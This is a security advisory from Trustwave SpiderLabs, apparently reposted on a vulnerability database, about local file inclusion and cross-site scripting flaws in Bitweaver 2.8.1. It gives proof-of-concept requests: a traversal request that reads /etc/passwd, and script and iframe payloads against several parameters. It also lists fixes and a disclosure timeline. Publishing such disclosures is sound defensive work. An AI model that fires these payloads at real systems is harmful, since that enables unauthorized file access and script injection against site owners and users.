Bitweaver 2.8.1 Cross Site Scripting & Local File Inclusion

2012.10.26
Credit: Trustwave
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79
CWE-98

Trustwave SpiderLabs Security Advisory TWSL2012-016: Multiple Vulnerabilities in Bitweaver Published: 10/23/2012 Version: 1.0 Vendor: Bitweaver (http://www.bitweaver.org/) Product: Bitweaver Version affected: 2.8.1 and earlier versions Product description: Bitweaver is a free and open source web application framework and content management system. Bitweaver is written in PHP and uses Firebird as a database backend. Credit: David Aaron and Jonathan Claudius of Trustwave SpiderLabs Finding 1: Local File Inclusion Vulnerability CVE: CVE-2012-5192 The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in Bitweaver is vulnerable to a local file inclusion vulnerability. This vulnerability can be demonstrated by traversing to a known readable path on the web server file system. Example: Performing LFI on 'overlay_type' parameter #Request http://A.B.C.D/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00 #Response root:x:0:0:root:/root:/bin/bash <snip> Finding 2: Multiple XSS Vulnerabilities in Bitweaver CVE: CVE-2012-5193 Multiple cross-site scripting (XSS) vulnerabilities have been discovered that allow remote unauthenticated users to run arbitrary scripts on the system. Example: The following Proof of Concepts illustrate that Bitweaver 2.8.1 is vulnerable to XSS. Example(s): 1. Performing XSS on stats/index.php #Request GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0 #Response HTTP/1.1 200 OK Date: Tue, 17 Apr 2012 15:42:34 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 [truncated due to length] 2. Performing XSS on /newsletters/edition.php #Request GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0 #Response HTTP/1.1 200 OK Date: Tue, 17 Apr 2012 15:42:02 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 [truncated due to length] 3. Performing XSS on the 'username' parameter available on /users/ #Request POST /bitweaver/users/remind_password.php HTTP/1.1 Host: A.B.C.D Content-Type: application/x-www-form-urlencoded Content-Length: 192 username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29 #Response HTTP/1.1 200 OK Date: Tue, 17 Apr 2012 15:53:11 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 15974 [truncated due to length] <snip> Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email. <snip> 4. Performing XSS on the 'days' parameter on /stats/index.php #Request POST /bitweaver/stats/index.php HTTP/1.1 Host: A.B.C.D Content-Type: application/x-www-form-urlencoded Content-Length: 177 days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display #Response HTTP/1.1 200 OK Date: Tue, 17 Apr 2012 15:55:53 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 24778 [truncated due to length] <snip> <img src="/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" /> <snip> 5. Performing XSS on the 'login' parameter on /users/register.php. (try entering "><IFRAME src="https://www.trustwave.com" height="1000px" width="1000px"> into the "Username field"): http://A.B.C.D/bitweaver/users/register.php 6. Performing XSS on the 'highlight' parameter: #Request GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0 #Response HTTP/1.1 200 OK Date: Tue, 17 Apr 2012 15:59:09 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 [truncated due to length] Remediation Steps: The vendor has released a fix to address the Local File Inclusion vulnerability (finding 1) and several of the Cross-Site Scripting vulnerabilities (finding 2) in Bitweaver 3.1. However, additional fixes for the Cross-site Scripting vulnerabilities were made on commit c3bef6f in the development branch. Users are recommended to download the latest release of Bitweaver on http://github.com/bitweaver to address the above issues. These issue can also be mitigated with the use of technologies, such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often, Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the presence of Local File Inclusion vulnerabilities and XSS. Trustwave technologies that address this issue include the following. ModSecurity (http://www.modsecurity.org/) has added rules to the commercial rules feed for these issues, available as part of the SpiderLabs ModSecurity rules feed. Trustwave's vulnerability scanning solution, TrustKeeper (https://www.trustwave.com/trustKeeper.php), has been updated to detect affected versions. References http://www.bitweaver.org/ http://blog.spiderlabs.com/ Vendor Communication Timeline: 04/26/12 - Initial communications with vendor 05/14/12 - Vulnerability disclosed to vendor 05/30/12 - Vendor acknowledges version 3.0 fixes issues 06/07/12 - Contact vendor regarding incomplete fixes in 3.0 09/07/12 - Vendor publishes version 3.1 10/10/12 - Contact vendor regarding incomplete fixes in 3.1 10/23/12 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

References:

http://www.bitweaver.org/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top